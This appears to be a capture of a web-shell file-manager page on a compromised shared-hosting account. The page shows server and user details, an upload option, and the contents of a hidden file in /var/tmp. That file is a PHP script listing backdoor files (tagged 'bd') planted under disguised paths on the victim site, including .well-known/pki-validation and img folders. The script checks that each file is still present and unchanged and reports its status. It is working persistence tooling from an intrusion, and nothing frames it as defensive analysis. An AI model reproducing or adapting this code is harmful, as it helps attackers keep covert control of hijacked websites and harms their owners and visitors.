HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/self/root/var/tmp/.descriptor
<?php   $r = '/home/vitanhod/bio-nissan.vitavit.com.pk'; $x = ["/includes/configOnline.php"=>"bd@@1316459@@8",
"/orderemail_bk.php"=>"bd@@1316644@@34",
"/img/layout.inc.php"=>"bd@@1316685@@64",
"/SReg.php"=>"bd@@1316524@@23",
"/includes/MX.php"=>"bd@@1316589@@82",
"/.well-known/event.php"=>"bd@@1310726@@1049",
"/SReg.php"=>"bd@@1309800@@997",
"/includes/MX.php"=>"bd@@1310635@@911",
"/.well-known/pki-validation/shortcodes.php"=>"bd@@1310671@@970",
"/img/layout.inc.php"=>"bd@@1310697@@991"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');